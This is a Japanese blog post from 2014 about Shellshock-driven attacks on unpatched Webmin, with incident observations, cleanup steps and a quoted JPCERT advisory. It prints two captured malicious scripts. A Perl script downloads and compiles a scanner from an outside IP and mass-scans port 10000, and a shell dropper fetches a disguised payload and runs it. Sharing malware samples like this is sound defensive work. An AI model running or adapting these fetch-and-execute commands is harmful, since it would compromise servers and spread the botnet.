Webminの脆弱性＋bashの脆弱性でトロイの木馬がroot権限で入る - M.C.P.C. (Mamesibori Creation Plus Communication)

bash 脆弱性（Shellshock）が発覚した後、Webminが1.710でShellshock脆弱性対策をされていたり、bash自体も対策版アップデートが出ていますが、Webminってroot権限で動いているということで、対策できていないWebminだと、root権限でリモートから不正コマンドを実行されてしまうわけで、ここ数日未対策Webminを狙った攻撃が喧しいです。

うちの観測だと、トロイの木馬侵入成功後、こんなくそコードが実行される

#!/usr/bin/perl

my $a = int(rand(225));
my $b = int(rand(255));;
print "scanning $a.$b.0.0\n";
system("killall pnscan;cd /tmp;wget http://82.165.xxx.xxx/t.gz -O tmp.gz;tar xf tmp.gz;rm -rf tmp.gz;cd tmp;make clean;make lnx;rm -rf pnscan.c");
system('cd /tmp;cd tmp;./pnscan -w"GET /webmin/index.cgi HTTP/1.0\r\n\r\n" '."$a.$b".'.0.0/8 10000;rm -rf /tmp/t.gz;rm -rf /dev/shm/*;rm -rf /run/shm/*');

これはものすごい勢いで外部IP（/16！）の10000/TCP（Webminが標準で設置されている）に攻撃しかけるやつです。

動かすとおそらくローカルポートを食い尽くしてnetstatがものすごい長く表示され、メモリが少ないマシンだとconntrackテーブルがあふれてパケロスが発生しだすと思います。Webサイトが一発で表示できなくなったりしたらそのサーバがやられている可能性あり……

Webminもbashも放置されているサーバ多そうだし、DDoSがひどくなりそう

（2014-10-8 13:40追記）

他の方が侵入された時の挙動を報告されていました

<a href="http://yamamotoplog.blog38.fc2.com/blog-entry-147.html">DTIのVPSのServersManがハッキングされた？（検証編）　perlとシェルスクリプト</a>

DTIのVPSのServersManがハッキングされた？（検証編） perlとシェルスクリプト

（2014-10-8 17:40追記）

このトロイの木馬はBackdoor.Linux.Tsunamiというタイプのマルウェアに分類されているやつなんです。wgetするプロセスがアンデッドのようによみがえってくる仕組みなんですけれども、Webminの脆弱性で侵入された場合、斥候スクリプトはWebminの実行ディレクトリ（RPMで入れた場合は /usr/libexec/webmin）をカレントディレクトリにして謎の8文字のコマンドが起動されます。

#!/bin/sh
str=`date | md5sum | head -c8`
wget http://82.165.xxx.xxx/img.png -O $str;chmod +x $str;./$str;rm -rf $str
echo $str

謎のimg.pngが実行コマンドとしてゲットされて、$strに入った謎の8文字をコマンド名として実行されます。

よって、メモリにそれがいる限りゾンビのごとくwgetで外部に読みに行く部分が動きますので、lsof /usr/webexec/webmin を実行して出てきたプロセスを全KILLすることでメモリに残っているマルウェアを停止。Webminも死ぬ。

そして、cronの謎記述も除去する（先のリンクのウェブサイトでやっておられること）。

※Webminとbashは更新しておかないとまたやられるので注意。あとここまでやられたらサーバ作り直すべき

（2014-10-9 1:39追記）

<a href="http://news.mynavi.jp/kikaku/2014/10/08/001/">"Shellshock"に乗じるマルウェアの動向 - Websense Security Labs</a> "Shellshock"に乗じるマルウェアの動向 - Websense Security Labs | マイナビニュース

えっと、DTIで借りてるVPS2台とも、CRON書き換えの被害にあっています。ログにはログイン履歴なし、アタックの記録もなし。これ気持ち悪いな
— 石川(404) (@penlabo) 2014, 10月 8

ここ数日ServersManとかConoHaとかネットワーク障害が出ているの、タイミング的にこれじゃないかなあと思っています。特にConoHaは「影響を及ぼしていた対象の通信につきましては遮断を実施」ってアナウンスされているし（会員にメールが来ている）いかにもそれっぽい

（2014-10-10 14:22追記）

TCP 10000番ポートへのスキャンの増加に関する注意喚起

概要

JPCERT/CC では、TCP 10000番ポートへのスキャンが 2014年9月下旬より増加していることを、インターネット定点観測システム (以下、TSUBAME) *1 において確認しています。

TCP 10000番ポートは、ウェブベースのシステム管理ツールである Webmin の標準ポートとして利用されることが多く、開発者によると Webmin は先日公開された GNU bash の脆弱性の影響を受けるとのことです。